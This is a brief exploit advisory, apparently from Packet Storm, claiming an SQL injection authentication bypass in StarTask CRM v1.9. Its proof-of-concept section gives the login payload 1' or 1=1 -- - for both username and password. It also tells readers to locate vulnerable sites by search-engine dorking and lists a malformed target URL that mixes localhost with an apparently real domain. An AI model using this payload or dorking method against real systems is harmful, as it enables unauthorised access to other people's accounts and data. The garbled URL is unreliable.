StarTask CRM version 1.9 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
6e2fd2cbf7c7bffe7c302d4b461bf6f489fbda9665b18dc56c36e3c574b89861====================================================================================================================================
| # Title : StarTask CRM v1.9 Auth by Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits) |
| # Vendor : https://p30vel.ir.domains.blog.ir/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] use payload : USer&Pass : 1' or 1=1 -- -
[+] https://www/127.0.0.1/rkexpress.in/dash.php
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed